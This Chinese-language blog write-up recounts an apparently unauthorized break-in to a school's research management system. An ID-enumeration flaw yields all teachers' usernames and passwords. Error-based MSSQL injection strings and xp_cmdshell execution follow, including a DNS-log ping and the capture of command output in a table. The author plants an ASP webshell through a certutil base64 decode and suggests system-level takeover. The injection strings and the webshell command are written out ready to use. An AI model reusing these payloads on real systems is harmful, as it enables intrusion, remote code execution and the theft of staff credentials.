正文

首先進入主頁是這個樣子

F12也沒找到啥接口。爆破也沒出來。注入也無。。。。陷入僵局。然后繼續翻IP。搜到一個人力資源管理系統

F12有驚喜,這里背景圖片居然是download+id。

然后順勢遍歷一波ID。TM居然拿到了全校老師的賬號密碼?????

拿到賬號密碼,回去科研管理系統登陸一波所有功能都點一遍,熟悉下環境

看這URL。。有點熟悉。這套系統還是Asp的。。后端應該就是IIS+Asp+SqlServer

熟悉了下語句,后端應該是

select xxxx from xxxx where 1=1 +and+left(CheckResult,2)>=12++and+(*,*+AllUsers+*,*+like+*~,10432,~*+)+ and ProjLevel=*03*

上語句,看看能不能報錯注入。

成功帶出數據,然后就查當前用戶(dbo),查庫查表

查庫trWhere=1=convert(int,(db_name()))--查版本信息strWhere=1=convert(int,(@@version))--獲取數據庫strWhere=1=convert(int,(select name from master..sysdatabases for xml path))--

碰到mssql,那必得試一波XP_CMDSHELL

trWhere=1=0;exec master..xp_cmdshell 'whoami';--

啊這沒回顯。

用dnslog驗證下。。這里簡單說一下坑點

exec master..xp_cmdshell 'ping xxxxxxx';

注:雖然接到了請求。但是請求的IP查出來是google的節點服務器????不去ping,又接不到請求。。就迷惑。

然后繼續搜文件,發現可以創建數據表,把xp_cmdshell的執行結果寫入數據表

trWhere=1=0;CREATE TABLE tt_tmp (id int identity(1,1),constraint pkid primary key (id),tmp1 varchar(8000));--//創建一個自增表。等會就可以通過id去查詢結果。這個web。只能輸出一條結果。而Mssql又沒有limit 1,1這種具體讀第N條數據的語句。只有TOP 2。返回兩條數據trWhere=1=0;insert into tt_tmp(tmp1) exec master..xp_cmdshell 'whoami';--//寫入命令執行的結果trWhere=1=(select  tmp1 from tt_tmp where id=1)--//通過id查詢

Mssql的xp_cmdshell執行時,會把\n單獨一行。。所以這里用ID具體查詢。

執行下whoami,發現是System權限,那么直接寫個webshell。之前用certutil請求VPS,沒收到,DNS也迷惑,感覺是不出網,學生網段和服務器網段也不能直通。。

只想到寫shell了,首先dir c:\ D:\ e:\,發現e:\科研管理系統感覺就是web目錄,然而。。各種奇奇怪怪的編碼問題。這里一開始用的是

for /r e:\\ %i in (Login.aspx) do @echo %i然后就可以列出e:\所有目錄。一個個慢慢找咯

雖然找到了Web目錄,我還是解決不了這個編碼問題,進都進不去,那咋寫shell???

正解:URL輸入的是UTF-8,服務端卻是GBK,所以嘚轉一下。解密后URL編碼傳入,這里感謝123qwer大師傅的指點。

base64.b64encode("科研管理系統".encode("gbk"))

然后繼續找啊找,發現了web目錄

然后寫shell又被惡心到了,xp_cmdshell的單引號不解析我的URL編碼,但是雙引號解析????這我記得是瀏覽器會自動解析的啊。。

然后asp一句話又有單引號,尖括號特殊字符

<%eval request("pass")%>

這我直接自閉,整了半天,要么就是直接報錯,要么就是寫入的文件沒引號了。

最后想到看過的一篇文章,利用certutil轉碼寫入文件

echo PCVleGVjdXRlKHJlcXVlc3QoInBhc3MiKSklPg== > web目錄\sorry.txtcertutil -decode web目錄\sorry.txt  web目錄\sorry.asp

直接用base64解碼寫入了,省去了很多煩惱當我訪問時,卻是500??然后嘗試用菜刀鏈接了下,居然可以連。。之后就隨便整了。

Server2008補丁很少,可以用exp直接提權,或者xp_cmdshell是system權限,傳個bind msf馬,xp_cmdshell執行下我們去連就拿到system了。

科研管理系統
撤稿糾錯
本作品采用《CC 協議》,轉載必須注明作者和本文鏈接